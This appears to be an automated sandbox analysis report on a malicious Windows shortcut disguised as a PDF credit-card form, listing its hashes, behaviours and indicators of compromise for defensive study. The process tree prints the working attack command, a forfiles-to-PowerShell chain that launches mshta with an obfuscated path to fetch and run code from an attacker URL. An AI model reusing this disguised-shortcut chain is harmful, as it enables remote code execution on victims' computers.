Analysis
-
max time kernel
136s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
25-10-2024 12:15
Static task
static1
Behavioral task
behavioral1
Sample
3rd_cc_form_Oct_2024.pdf.lnk.download.lnk
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
3rd_cc_form_Oct_2024.pdf.lnk.download.lnk
Resource
win10v2004-20241007-en
General
-
Target
3rd_cc_form_Oct_2024.pdf.lnk.download.lnk
-
Size
1KB
-
MD5
d53df33a543f82f01cd65a969c026f0c
-
SHA1
92b8d55b4dccdcdfc076e08dc10e8f878075a4f7
-
SHA256
a1d7f4bc74b920f6ea79f7d3ed3ac9c544401605688fc968cc27e1a62b9482f6
-
SHA512
a4b62d3d7d9a1f251c6f2fc1eecec006cd32ed5f206990c84c0f1e3ebb6e86564c5042412c6b329e2a6d44bd2232a89add3db92703e3c779110f83105ea0c49e
Malware Config
Extracted
https://urban-trek.shop/api/uz/0547131764/Linipute.json
Signatures
-
Blocklisted process makes network request 2 IoCs
Processes:
mshta.exeflow pid Process 8 428 mshta.exe 10 428 mshta.exe -
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
cmd.exedescription ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation cmd.exe -
Indirect Command Execution 1 TTPs 1 IoCs
Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.exepid Process 5016 powershell.exe 5016 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid Process Token: SeDebugPrivilege 5016 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
Processes:
cmd.exeforfiles.exepowershell.exedescription pid Process procid_target PID 1728 wrote to memory of 3892 1728 cmd.exe 85 PID 1728 wrote to memory of 3892 1728 cmd.exe 85 PID 3892 wrote to memory of 5016 3892 forfiles.exe 86 PID 3892 wrote to memory of 5016 3892 forfiles.exe 86 PID 5016 wrote to memory of 428 5016 powershell.exe 87 PID 5016 wrote to memory of 428 5016 powershell.exe 87
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\3rd_cc_form_Oct_2024.pdf.lnk.download.lnk1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1728 -
C:\Windows\System32\forfiles.exe"C:\Windows\System32\forfiles.exe" /p C:\Windows /m notep*.exe /c "powershell Start-Process \*i*\*2\msh*e https://urban-trek.shop/api/uz/0547131764/Linipute.json"2⤵
- Indirect Command Execution
- Suspicious use of WriteProcessMemory
PID:3892 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeStart-Process \*i*\*2\msh*e https://urban-trek.shop/api/uz/0547131764/Linipute.json3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5016 -
C:\Windows\System32\mshta.exe"C:\Windows\System32\mshta.exe" https://urban-trek.shop/api/uz/0547131764/Linipute.json4⤵
- Blocklisted process makes network request
PID:428
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82